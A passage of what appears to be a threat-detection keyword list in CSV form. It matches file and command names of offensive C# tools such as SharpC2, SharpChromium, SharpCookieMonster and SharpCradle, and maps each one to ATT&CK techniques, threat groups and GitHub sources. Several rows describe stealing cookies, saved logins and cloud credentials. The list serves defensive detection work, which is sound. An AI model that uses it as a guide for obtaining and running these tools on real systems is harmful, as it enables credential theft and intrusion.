tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpC2 *,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,0,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SharpC2*.cs*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SharpC2*.exe*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*sharpc2*client-windows.zip*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - 
TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SharpC2.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SharpC2.API*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SharpC2Event*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SharpC2Hub*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SharpC2Webhook*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SharpCalendar.exe*,offensive_tool_keyword,cobaltstrike,.NET Assembly to Retrieve Outlook Calendar Details,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpCalendar,1,1,N/A,10,10,13,1,2021-10-07T19:42:20Z,2021-10-07T17:11:46Z -*SharpCat.exe*,offensive_tool_keyword,cobaltstrike,C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/OG-Sadpanda/SharpCat,1,1,N/A,10,10,16,5,2021-07-15T15:01:02Z,2021-07-15T14:57:53Z -*SharpChisel.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpChrome backupkey*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpChrome.cs*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpChrome.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*sharpchromium *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z 
-*SharpChromium.csproj*,offensive_tool_keyword,SharpChromium,.NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.,T1555.003 - T1114.001 - T1555.004,TA0006 - TA0003,N/A,N/A,Credential Access,https://github.com/djhohnstein/SharpChromium,1,1,N/A,10,7,608,98,2020-10-23T22:28:13Z,2018-08-06T21:25:21Z -*SharpChromium.exe*,offensive_tool_keyword,SharpChromium,.NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.,T1555.003 - T1114.001 - T1555.004,TA0006 - TA0003,N/A,N/A,Credential Access,https://github.com/djhohnstein/SharpChromium,1,1,N/A,10,7,608,98,2020-10-23T22:28:13Z,2018-08-06T21:25:21Z -*SharpChromium.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpChromium.sln*,offensive_tool_keyword,SharpChromium,.NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.,T1555.003 - T1114.001 - T1555.004,TA0006 - TA0003,N/A,N/A,Credential Access,https://github.com/djhohnstein/SharpChromium,1,1,N/A,10,7,608,98,2020-10-23T22:28:13Z,2018-08-06T21:25:21Z -*SharpChromium-master*,offensive_tool_keyword,SharpChromium,.NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.,T1555.003 - T1114.001 - T1555.004,TA0006 - TA0003,N/A,N/A,Credential 
Access,https://github.com/djhohnstein/SharpChromium,1,1,N/A,10,7,608,98,2020-10-23T22:28:13Z,2018-08-06T21:25:21Z -*SharpClipHistory*,offensive_tool_keyword,SharpClipHistory,SharpClipHistory is a .NET 4.5 application written in C# that can be used to read the contents of a users clipboard history in Windows 10 starting from the 1809 Build.,T1115 - T1113 - T1015 - T1053 - T1059,TA0003 - TA0007,N/A,N/A,Information Gathering,https://github.com/FSecureLABS/SharpClipHistory,1,1,N/A,N/A,2,179,36,2020-01-23T13:39:13Z,2019-04-25T22:17:08Z -*sharpcloud.cna*,offensive_tool_keyword,SharpCloud,Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.,T1083 - T1059.001 - T1114.002,TA0007 - TA0002 ,N/A,N/A,Credential Access,https://github.com/chrismaddalena/SharpCloud,1,1,N/A,10,2,154,27,2018-09-18T02:24:10Z,2018-08-20T15:06:22Z -*SharpCloud.csproj*,offensive_tool_keyword,SharpCloud,Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.,T1083 - T1059.001 - T1114.002,TA0007 - TA0002 ,N/A,N/A,Credential Access,https://github.com/chrismaddalena/SharpCloud,1,1,N/A,10,2,154,27,2018-09-18T02:24:10Z,2018-08-20T15:06:22Z -*SharpCloud.exe*,offensive_tool_keyword,SharpCloud,Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.,T1083 - T1059.001 - T1114.002,TA0007 - TA0002 ,N/A,N/A,Credential Access,https://github.com/chrismaddalena/SharpCloud,1,1,N/A,10,2,154,27,2018-09-18T02:24:10Z,2018-08-20T15:06:22Z -*SharpCloud.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpCloud.sln*,offensive_tool_keyword,SharpCloud,Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.,T1083 - T1059.001 - T1114.002,TA0007 - TA0002 ,N/A,N/A,Credential Access,https://github.com/chrismaddalena/SharpCloud,1,1,N/A,10,2,154,27,2018-09-18T02:24:10Z,2018-08-20T15:06:22Z -*SharpCloud-master*,offensive_tool_keyword,SharpCloud,Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.,T1083 - T1059.001 - T1114.002,TA0007 - TA0002 ,N/A,N/A,Credential Access,https://github.com/chrismaddalena/SharpCloud,1,1,N/A,10,2,154,27,2018-09-18T02:24:10Z,2018-08-20T15:06:22Z -*SharpCOM.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpCOMManager.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*sharpcompile*.exe*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,1,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*sharpCompileHandler*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,1,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*SharpCompileServer*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,1,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*SharpCompileServer.exe*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,1,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*SharpConfigParser.dll*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*sharpcookiemonster*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - 
TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SharpCookieMonster*WebSocket4Net.dll*,offensive_tool_keyword,SharpCookieMonster,This C# project will dump cookies for all sites. even those with httpOnly/secure/session,T1539 - T1606,TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/m0rv4i/SharpCookieMonster,1,1,N/A,N/A,2,184,41,2023-03-15T09:51:09Z,2020-01-22T18:39:49Z -*SharpCookieMonster.csproj*,offensive_tool_keyword,SharpCookieMonster,This C# project will dump cookies for all sites. even those with httpOnly/secure/session,T1539 - T1606,TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/m0rv4i/SharpCookieMonster,1,1,N/A,N/A,2,184,41,2023-03-15T09:51:09Z,2020-01-22T18:39:49Z -*SharpCookieMonster.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpCookieMonster.exe*,offensive_tool_keyword,SharpCookieMonster,This C# project will dump cookies for all sites. even those with httpOnly/secure/session,T1539 - T1606,TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/m0rv4i/SharpCookieMonster,1,1,N/A,N/A,2,184,41,2023-03-15T09:51:09Z,2020-01-22T18:39:49Z -*SharpCookieMonster.sln*,offensive_tool_keyword,SharpCookieMonster,This C# project will dump cookies for all sites. 
even those with httpOnly/secure/session,T1539 - T1606,TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/m0rv4i/SharpCookieMonster,1,1,N/A,N/A,2,184,41,2023-03-15T09:51:09Z,2020-01-22T18:39:49Z -*SharpCookieMonsterOriginal.exe*,offensive_tool_keyword,SharpCookieMonster,This C# project will dump cookies for all sites. even those with httpOnly/secure/session,T1539 - T1606,TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/m0rv4i/SharpCookieMonster,1,1,N/A,N/A,2,184,41,2023-03-15T09:51:09Z,2020-01-22T18:39:49Z -*SharpCradle*logonpasswords*,offensive_tool_keyword,cobaltstrike,SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/SharpCradle,1,1,N/A,10,10,275,59,2020-12-30T17:15:51Z,2018-10-23T06:21:53Z -*SharpCradle.exe*,offensive_tool_keyword,cobaltstrike,SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.,T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/SharpCradle,1,1,N/A,10,10,275,59,2020-12-30T17:15:51Z,2018-10-23T06:21:53Z -*SharpCrashEventLog.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
